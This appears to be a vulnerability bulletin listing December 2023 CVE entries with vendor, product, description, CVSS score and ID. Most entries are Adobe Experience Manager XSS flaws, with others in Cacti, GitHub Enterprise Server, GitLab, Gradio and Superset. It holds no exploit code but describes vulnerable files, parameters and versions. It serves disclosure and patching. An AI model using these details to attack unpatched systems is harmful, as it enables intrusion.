adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48590
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48591
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48592
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48593
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48594
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48595
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48596
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48597
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48598
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48599
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48600
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48601
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48602
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48603
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48604
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48605
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48606
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48607
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48609
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48610
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48611
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48612
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48613
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48614
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48615
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48616
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48617
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48618
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48619
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48620
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48621
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48622
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48623
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48624
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51457
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51458
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-205.4CVE-2023-51459
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51460
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-205.4CVE-2023-51461
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-205.4CVE-2023-51462
[email protected]
aiven-open — journalpumpjournalpump is a daemon that takes log messages from journald and pumps them to a given output. A logging vulnerability was found in journalpump which logs out the configuration of a service integration in plaintext to the supplied logging pipeline, including credential information contained in the configuration if any. The problem has been patched in journalpump 2.5.0.2023-12-216.5CVE-2023-51390
[email protected]
[email protected]
ansible — ansibleAn absolute path traversal attack exists in the Ansible automation platform. This flaw allows an attacker to craft a malicious Ansible role and make the victim execute the role. A symlink can be used to overwrite a file outside of the extraction path.2023-12-186.3CVE-2023-5115
[email protected]
[email protected]
[email protected]
[email protected]
apache — streamparkIn the Streampark platform, when users log in to the system and use certain features, some pages provide a name-based fuzzy search, such as job names, role names, etc. The sql syntax :select * from table where jobName like ‘%jobName%’. However, the jobName field may receive illegal parameters, leading to SQL injection. This could potentially result in information leakage. Mitigation: Users are recommended to upgrade to version 2.1.2, which fixes the issue.2023-12-154.9CVE-2023-30867
[email protected]
apache — supersetUncontrolled resource consumption can be triggered by authenticated attacker that uploads a malicious ZIP to import database, dashboards or datasets.   This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1.2023-12-196.5CVE-2023-46104
[email protected]
[email protected]
apache — supersetA where_in JINJA macro allows users to specify a quote, which combined with a carefully crafted statement would allow for SQL injection in Apache Superset. This issue affects Apache Superset: before 2.1.2, from 3.0.0 before 3.0.2. Users are recommended to upgrade to version 3.0.2, which fixes the issue.2023-12-196.5CVE-2023-49736
[email protected]
[email protected]
apple — macosHCL Launch may mishandle input validation of an uploaded archive file leading to a denial of service due to resource exhaustion.2023-12-215.3CVE-2023-45703
[email protected]
automad — automadA vulnerability was found in automad up to 1.10.9. It has been declared as critical. This vulnerability affects the function import of the file FileController.php. The manipulation of the argument importUrl leads to server-side request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-248686 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-216.3CVE-2023-7037
[email protected]
[email protected]
[email protected]
automad — automadA vulnerability was found in automad up to 1.10.9. It has been classified as problematic. This affects the function upload of the file FileCollectionController.php of the component Content Type Handler. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248685 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-214.7CVE-2023-7036
[email protected]
[email protected]
[email protected]
automad — automadA vulnerability was found in automad up to 1.10.9. It has been rated as problematic. This issue affects some unknown processing of the file /dashboard?controller=UserCollection::createUser of the component User Creation Handler. The manipulation leads to cross-site request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248687. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.2023-12-214.3CVE-2023-7038
[email protected]
[email protected]
[email protected]
aveva — edgeAn issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts’ responses.2023-12-165.3CVE-2021-42794
[email protected]
[email protected]
[email protected]
aws — aws-sdk-phpAWS SDK for PHP is the Amazon Web Services software development kit for PHP. Within the scope of requests to S3 object keys and/or prefixes containing a Unix double-dot, a URI path traversal is possible. The issue exists in the `buildEndpoint` method in the RestSerializer component of the AWS SDK for PHP v3 prior to 3.288.1. The `buildEndpoint` method relies on the Guzzle Psr7 UriResolver utility, which strips dot segments from the request path in accordance with RFC 3986. Under certain conditions, this could lead to an arbitrary object being accessed. This issue has been patched in version 3.288.1.2023-12-226CVE-2023-51651
[email protected]
[email protected]
[email protected]
bazarr — bazarrBazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols.2023-12-155.3CVE-2023-50266
[email protected]
[email protected]
[email protected]
beijing_baichuo — s210A vulnerability classified as critical has been found in Beijing Baichuo S210 up to 20231210. Affected is an unknown function of the file /importexport.php. The manipulation of the argument sql leads to injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248688.2023-12-216.3CVE-2023-7039
[email protected]
[email protected]
[email protected]
bosch — building_integration_system_video_engineAn improper handling of a malformed API answer packets to API clients in Bosch BT software products can allow an unauthenticated attacker to cause a Denial of Service (DoS) situation. To exploit this vulnerability an attacker has to replace an existing API server e.g. through Man-in-the-Middle attacks.2023-12-185.9CVE-2023-35867
[email protected]
bosch — cpp14_firmwareAn information disclosure vulnerability was discovered in Bosch IP camera devices allowing an unauthenticated attacker to retrieve information (like capabilities) about the device itself and network settings of the device, disclosing possibly internal network settings if the device is connected to the internet.2023-12-185.3CVE-2022-41677
[email protected]
cacti — cactiCacti is a robust performance and fault management framework and a frontend to RRDTool – a Time Series Database (TSDB). Bypassing an earlier fix (CVE-2023-39360) that leads to a DOM XSS attack. Exploitation of the vulnerability is possible for an authorized user. The vulnerable component is the `graphs_new.php`. Impact of the vulnerability – execution of arbitrary javascript code in the attacked user’s browser. This issue has been patched in version 1.2.26.2023-12-226.1CVE-2023-49086
[email protected]
cacti — cactiCacti is an open source operational monitoring and fault management framework. The fix applied for CVE-2023-39515 in version 1.2.25 is incomplete as it enables an adversary to have a victim browser execute malicious code when a victim user hovers their mouse over the malicious data source path in `data_debug.php`. To perform the cross-site scripting attack, the adversary needs to be an authorized cacti user with the following permissions: `General Administration>Sites/Devices/Data`. The victim of this attack could be any account with permissions to view `http://<HOST>/cacti/data_debug.php`. As of time of publication, no complete fix has been included in Cacti.2023-12-226.1CVE-2023-49088
[email protected]
[email protected]
[email protected]
cacti — cactiCacti is an open source operational monitoring and fault management framework. A reflection cross-site scripting vulnerability was discovered in version 1.2.25. Attackers can exploit this vulnerability to perform actions on behalf of other users. The vulnerability is found in `templates_import.php.` When uploading an xml template file, if the XML file does not pass the check, the server will give a JavaScript pop-up prompt, which contains unfiltered xml template file name, resulting in XSS. An attacker exploiting this vulnerability could execute actions on behalf of other users. This ability to impersonate users could lead to unauthorized changes to settings. As of time of publication, no patched versions are available.2023-12-225.4CVE-2023-50250
[email protected]
[email protected]
clear — clearml_serverCross-site Scripting (XSS) – Stored in GitHub repository allegroai/clearml-server prior to 1.13.0. This vulnerability affects the ClearML Open Source Server which is not designed to be used as a publicly available service. Security recommendations stress it should be placed behind a company firewall or VPN. This vulnerability only affects users within the same organisation (I.e when a malicious party already has access to the internal network and to a user’s ClearML login credentials).2023-12-185.4CVE-2023-6778
[email protected]
[email protected]
clickhouse — clickhouseClickHouse® is an open-source column-oriented database management system that allows generating analytical data reports in real-time. This vulnerability is an integer underflow resulting in crash due to stack buffer overflow in decompression of FPC codec. It can be triggered and exploited by an unauthenticated attacker. The vulnerability is very similar to CVE-2023-47118 with how the vulnerable function can be exploited.2023-12-215.9CVE-2023-48298
[email protected]
[email protected]
codelyfe — stupid_simple_cmsA vulnerability, which was classified as critical, has been found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this issue is some unknown functionality of the file /file-manager/rename.php. The manipulation of the argument newName leads to path traversal: ‘../filedir’. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248690 is the identifier assigned to this vulnerability.2023-12-215.4CVE-2023-7041
[email protected]
[email protected]
[email protected]
codelyfe — stupid_simple_cmsA vulnerability classified as problematic was found in codelyfe Stupid Simple CMS up to 1.2.4. Affected by this vulnerability is an unknown functionality of the file /file-manager/rename.php. The manipulation of the argument oldName leads to path traversal: ‘../filedir’. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248689 was assigned to this vulnerability.2023-12-214.3CVE-2023-7040
[email protected]
[email protected]
[email protected]
corveda — phpsandboxA vulnerability was found in Corveda PHPSandbox 1.3.4 and classified as critical. Affected by this issue is some unknown functionality of the component String Handler. The manipulation leads to protection mechanism failure. The attack may be launched remotely. Upgrading to version 1.3.5 is able to address this issue. The patch is identified as 48fde5ffa4d76014bad260a3cbab7ada3744a4cc. It is recommended to upgrade the affected component. VDB-248270 is the identifier assigned to this vulnerability.2023-12-194.3CVE-2014-125107
[email protected]
[email protected]
[email protected]
[email protected]
csharp — cws_collaborative_development_platformSmartStar Software CWS is a web-base integration platform, it has a vulnerability of using a hard-coded for a specific account with low privilege. An unauthenticated remote attacker can exploit this vulnerability to run partial processes and obtain partial information, but can’t disrupt service or obtain sensitive information.2023-12-156.5CVE-2023-48374
[email protected]
dell — cpg_biosDell BIOS contains an Improper Input Validation vulnerability. A local malicious user with high privileges could potentially exploit this vulnerability in order to corrupt memory on the system.2023-12-226.7CVE-2023-39251
[email protected]
dell — emc_networkerDell NetWorker Virtual Edition versions 19.8 and below contains the use of deprecated cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability leading to some information disclosure.2023-12-185.3CVE-2023-28053
[email protected]
dfir-iris — iris-webIris is a web collaborative platform aiming to help incident responders sharing technical details during investigations. A stored Cross-Site Scripting (XSS) vulnerability has been identified in iris-web, affecting multiple locations in versions prior to v2.3.7. The vulnerability may allow an attacker to inject malicious scripts into the application, which could then be executed when a user visits the affected locations. This could lead to unauthorized access, data theft, or other related malicious activities. An attacker need to be authenticated on the application to exploit this vulnerability. The issue is fixed in version v2.3.7 of iris-web. No known workarounds are available.2023-12-224.6CVE-2023-50712
[email protected]
[email protected]
dfirkuiper — kuiperA vulnerability, which was classified as problematic, was found in DFIRKuiper Kuiper 2.3.4. This affects the function unzip_file of the file kuiper/app/controllers/case_management.py of the component TAR Archive Handler. The manipulation of the argument dst_path leads to path traversal. It is possible to initiate the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 2.3.5 is able to address this issue. The identifier of the patch is 94fa135153002f651f5526c55a7240e083db8d73. It is recommended to upgrade the affected component. The identifier VDB-248277 was assigned to this vulnerability.2023-12-185.9CVE-2023-6908
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
efacec — uc_500eAn attacker with network access could perform a man-in-the-middle (MitM) attack and capture sensitive information to gain unauthorized access to the application.2023-12-206.3CVE-2023-50703
[email protected]
efacec — uc_500eAn attacker could create malicious requests to obtain sensitive information about the web server.2023-12-205.3CVE-2023-50705
[email protected]
efacec — uc_500eAn attacker could construct a URL within the application that causes a redirection to an arbitrary external domain and could be leveraged to facilitate phishing attacks against application users.2023-12-204.3CVE-2023-50704
[email protected]
efacec — uc_500eA user without administrator permissions with access to the UC500 windows system could perform a memory dump of the running processes and extract clear credentials or valid session tokens.2023-12-204.1CVE-2023-50706
[email protected]
enterprise_server — enterprise_serverImproper access control in all versions of GitHub Enterprise Server allows unauthorized users to view private repository names via the “Get a check run” API endpoint. This vulnerability did not allow unauthorized access to any repository content besides the name. This vulnerability affected GitHub Enterprise Server version 3.7.0 and above and was fixed in version 3.17.19, 3.8.12, 3.9.7 3.10.4, and 3.11.0.2023-12-215.3CVE-2023-46646
[email protected]
[email protected]
[email protected]
[email protected]
enterprise_server — enterprise_serverAn incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be updated with an improperly scoped token. This vulnerability did not allow unauthorized access to any repository content as it also required contents:write and issues:read permissions. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-214.9CVE-2023-51379
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
enterprise_server — enterprise_serverImproper privilege management allowed arbitrary workflows to be committed and run using an improperly scoped PAT. To exploit this, a workflow must have already existed in the target repo. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.2023-12-216.5CVE-2023-6804
[email protected]
[email protected]
[email protected]
[email protected]
enterprise_server — enterprise_serverA race condition in GitHub Enterprise Server allows an outside collaborator to be added while a repository is being transferred. This vulnerability affected all versions of GitHub Enterprise Server since 3.8 and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1.2023-12-215.8CVE-2023-6803
[email protected]
[email protected]
[email protected]
[email protected]
ethex — contractsA vulnerability was found in Ethex Contracts. It has been classified as critical. This affects an unknown part of the file EthexJackpot.sol of the component Monthly Jackpot Handler. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 6b8664b698d3d953e16c284fadc6caeb9e58e3db. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-248271.2023-12-194.3CVE-2019-25157
[email protected]
[email protected]
[email protected]
[email protected]
gallagher — command_centreClient-Side enforcement of Server-Side security for the Command Centre server could be bypassed and lead to invalid configuration with undefined behavior. This issue affects: Gallagher Command Centre 8.90 prior to vEL8.90.1620 (MR2), all versions of 8.80 and prior.2023-12-185.4CVE-2023-23570
[email protected]
gallagher — command_centre_diagnostics_serviceA reliance on untrusted inputs in a security decision could be exploited by a privileged user to configure the Gallagher Command Centre Diagnostics Service to use less secure communication protocols. This issue affects: Gallagher Diagnostics Service prior to v1.3.0 (distributed in 9.00.1507(MR1)).2023-12-185.5CVE-2023-46686
[email protected]
gallagher — command_centre_serverIncorrect behavior order in the Command Centre Server could allow privileged users to gain physical access to the site for longer than intended after a network outage when competencies are used in the access decision. This issue affects: Gallagher Command Centre: 8.90 prior to vEL8.90.1620 (MR2), 8.80 prior to vEL8.80.1369 (MR3), 8.70 prior to vEL8.70.2375 (MR5), 8.60 prior to vEL8.60.2550 (MR7), all versions of 8.50 and prior.2023-12-184.3CVE-2023-23576
[email protected]
gallagher — command_centre_serverAn observable response discrepancy in the Gallagher Command Centre RESTAPI allows an insufficiently-privileged user to infer the presence of items that would not otherwise be viewable. This issue affects: Gallagher Command Centre 8.70 prior to vEL8.70.1787 (MR2), 8.60 prior to vEL8.60.2039 (MR4), all version of 8.50 and prior.2023-12-184.3CVE-2023-23584
[email protected]
gallagher — controller_7000Incorrect selection of fuse values in the Controller 7000 platform allows an attacker to bypass some protection mechanisms to enable local debug. This issue affects: Gallagher Controller 7000 9.00 prior to vCR9.00.231204b (distributed in 9.00.1507 (MR1)), 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)).2023-12-186.8CVE-2023-6355
[email protected]
getsentry — symbolicatorSymbolicator is a service used in Sentry. Starting in Symbolicator version 0.3.3 and prior to version 21.12.1, an attacker could make Symbolicator send GET HTTP requests to arbitrary URLs with internal IP addresses by using an invalid protocol. The responses of those requests could be exposed via Symbolicator’s API. In affected Sentry instances, the data could be exposed through the Sentry API and user interface if the attacker has a registered account. The issue has been fixed in Symbolicator release 23.12.1, Sentry self-hosted release 23.12.1, and has already been mitigated on sentry.io on December 18, 2023. If updating is not possible, some other mitigations are available. One may disable JS processing by toggling the option `Allow JavaScript Source Fetching` in `Organization Settings > Security & Privacy` and/or disable all untrusted public repositories under `Project Settings > Debug Files`. Alternatively, if JavaScript and native symbolication are not required, disable Symbolicator completely in `config.yml`.2023-12-224.3CVE-2023-51451
[email protected]
[email protected]
[email protected]
[email protected]
github — enterprise_serverA path traversal vulnerability was identified in GitHub Enterprise Server that allowed arbitrary file reading when building a GitHub Pages site. To exploit this vulnerability, an attacker would need permission to create and build a GitHub Pages site on the GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. This vulnerability was reported via the GitHub Bug Bounty program.2023-12-216.8CVE-2023-46645
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
github — enterprise_serverA race condition in GitHub Enterprise Server was identified that could allow an attacker administrator access. To exploit this, an organization needs to be converted from a user. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.7.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. 2023-12-216.3CVE-2023-46649
[email protected]
[email protected]
[email protected]
[email protected]
[email protected]
gitlab — gitlabAn issue has been discovered in GitLab CE/EE affecting all versions before 16.4.4, all versions starting from 15.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when source code or installation packages are pulled from a specific tag.2023-12-156.5CVE-2023-6051
[email protected]
[email protected]
gitlab — gitlabAn issue has been discovered in GitLab CE/EE affecting all versions from 16.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. File integrity may be compromised when specific HTML encoding is used for file names leading for incorrect representation in the UI.2023-12-155.7CVE-2023-5512
[email protected]
[email protected]
gitlab — gitlabAn issue has been discovered in GitLab affecting all versions starting from 9.3 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. In certain situations, it may have been possible for developers to override predefined CI variables via the REST API.2023-12-154.3CVE-2023-5061
[email protected]
[email protected]
gradio — gradioGradio is an open-source Python package that allows you to quickly build a demo or web application for your machine learning model, API, or any arbitary Python function. Versions of `gradio` prior to 4.11.0 contained a vulnerability in the `/file` route which made them susceptible to file traversal attacks in which an attacker could access arbitrary files on a machine running a Gradio app with a public URL (e.g. if the demo was created with `share=True`, or on Hugging Face Spaces) if they knew the path of files to look for. This issue has been patched in version 4.11.0.2023-12-225.6CVE-2023-51449
[email protected]
[email protected]
[email protected]
grails — grailsGrails is a framework used to build web applications with the Groovy programming language. A specially crafted web request can lead to a JVM crash or denial of service. Any Grails framework application using Grails data binding is vulnerable. This issue has been patched in version 3.3.17, 4.1.3, 5.3.4, 6.1.0.2023-12-216.5CVE-2023-46131
[email protected]
[email protected]
[email protected]
[email protected]
